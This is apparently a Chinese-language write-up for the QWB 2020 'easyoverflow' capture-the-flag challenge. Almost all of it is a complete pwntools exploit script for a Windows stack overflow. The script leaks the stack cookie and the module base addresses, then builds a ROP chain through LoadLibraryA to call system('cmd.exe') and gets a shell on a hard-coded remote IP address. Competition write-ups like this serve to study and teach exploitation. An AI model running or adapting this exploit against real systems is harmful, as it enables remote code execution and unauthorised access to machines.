qwb2020_easyoverflow

栈溢出，可以利用3次

由于没有截断字符串，因此puts可以泄露出栈里的数据，在最后一次我们做rop重新回到main函数再一次进行利用，泄露出其他数据。由于windows上调用writefile的参数太多了，我们就直接使用kernel32.dll里的LoadLibraryA获得ucrtbase.dll加载地址，然后得到system地址，调用system(“cmd.exe”)来getshell。

#coding:utf8
from pwn import *


#context.log_level = 'debug'
Local = False


if Local:
   kernel32_offset = 0x84d4
   ntdll_offset = 0x6E871
   #add dword ptr [rbp - 0x14], esi ; mov eax, edx ; ret
   add_p_rbp_esi = 0x4c464
   pop_rbp = 0x1281
   pop_rsi = 0x2481
   pop_rcx = 0x95da5
   LoadLibraryA = 0x1FB90
   add_rax_rcx = 0x72722
   jmp_rax = 0x258e0
   system_offset = 0xA40C0
   sh = remote('192.168.232.137',6666)
else:
   kernel32_offset = 0x17974
   ntdll_offset = 0x6A271
   #add dword ptr [rbp - 0x14], esi ; mov eax, edx ; ret
   add_p_rbp_esi = 0x493a0
   pop_rbp = 0x120c
   pop_rsi = 0x1661
   pop_rcx = 0x9217b
   LoadLibraryA = 0x1F220
   add_rax_rcx = 0x5dc9
   jmp_rax = 0x236e0
   system_offset = 0xABBA0
   sh = remote('39.99.46.209',13389)


#第一轮
sh.sendafter('input:','a'*0x100)
sh.recvuntil('a'*0x100)
stack_cookie = u64(sh.recvuntil('\r\n',drop = True).ljust(8,'\x00'))
print 'stack_cookie=',hex(stack_cookie)


sh.sendafter('input:','a'*0x118)
sh.recvuntil('a'*0x118)
exe_base = u64(sh.recv(6).ljust(8,'\x00')) - 0x12f4
data_addr = exe_base + 0x3e80
print 'exe_base=',hex(exe_base)
print 'data_addr=',hex(data_addr)
main_addr = exe_base + 0x1000
sh.sendafter('input:','a'*0x100 + p64(stack_cookie) + 'a'*0x10 + p64(main_addr))


#第二轮
sh.sendafter('input:','a'*0x100)
sh.recvuntil('a'*0x100)
stack_cookie = u64(sh.recvuntil('\r\n',drop = True).ljust(8,'\x00'))
print 'stack_cookie=',hex(stack_cookie)
#泄露kernel32.dll地址
sh.sendafter('input:','a'*0x150)
sh.recvuntil('a'*0x150)
kernel32_base = u64(sh.recv(6).ljust(8,'\x00')) - kernel32_offset
print 'kernel32_base=',hex(kernel32_base)
add_p_rbp_esi += kernel32_base
pop_rbp += kernel32_base
pop_rsi += kernel32_base
LoadLibraryA += kernel32_base
add_rax_rcx += kernel32_base
jmp_rax += kernel32_base
sh.sendafter('input:','a'*0x100 + p64(stack_cookie) + 'a'*0x10 + p64(main_addr))
#第三轮
sh.sendafter('input:','a'*0x100)
sh.recvuntil('a'*0x100)
stack_cookie = u64(sh.recvuntil('\r\n',drop = True).ljust(8,'\x00'))
print 'stack_cookie=',hex(stack_cookie)
#泄露ntdll.dll地址
sh.sendafter('input:','a'*0x178)
sh.recvuntil('a'*0x178)
ntdll_base = u64(sh.recv(6).ljust(8,'\x00')) - ntdll_offset
print 'ntdll_base=',hex(ntdll_base)
pop_rcx += ntdll_base
sh.sendafter('input:','a'*0x100 + p64(stack_cookie) + 'a'*0x10 + p64(main_addr))


#第四轮
sh.sendafter('input:','a'*0x100)
sh.recvuntil('a'*0x100)
stack_cookie = u64(sh.recvuntil('\r\n',drop = True).ljust(8,'\x00'))
print 'stack_cookie=',hex(stack_cookie)
sh.sendafter('input:','haivk')


payload = 'a'*0x100 + p64(stack_cookie) + 'a'*0x8 + p64(system_offset)
#将ucrtbase.dll字符串保存到data段
payload += p64(pop_rbp) + p64(data_addr + 0x14)
payload += p64(pop_rsi) + p64(0x74726375)
payload += p64(add_p_rbp_esi)
payload += p64(pop_rbp) + p64(data_addr + 0x4 + 0x14)
payload += p64(pop_rsi) + p64(0x65736162)
payload += p64(add_p_rbp_esi)
payload += p64(pop_rbp) + p64(data_addr + 0x8 + 0x14)
payload += p64(pop_rsi) + p64(0x6C6C642E)
payload += p64(add_p_rbp_esi)
payload += p64(pop_rbp) + p64(data_addr + 0xC + 0x14)
payload += p64(pop_rsi) + p64(0)
payload += p64(add_p_rbp_esi)
#将cmd.exe字符串保存到data段
payload += p64(pop_rbp) + p64(data_addr + 0x10 + 0x14)
payload += p64(pop_rsi) + p64(0x2E646D63)
payload += p64(add_p_rbp_esi)
payload += p64(pop_rbp) + p64(data_addr + 0x14 + 0x14)
payload += p64(pop_rsi) + p64(0x657865)
payload += p64(add_p_rbp_esi)


#LoadLibraryA("ucrtbase.dll")
payload += p64(pop_rcx) + p64(data_addr) + p64(pop_rsi) + p64(add_rax_rcx) + p64(LoadLibraryA)
payload += p64(pop_rcx) + p64(system_offset) + p64(add_rax_rcx)
payload += p64(pop_rcx) + p64(data_addr + 0x10) + p64(jmp_rax)


raw_input()
sh.sendafter('input:',payload)

sh.interactive()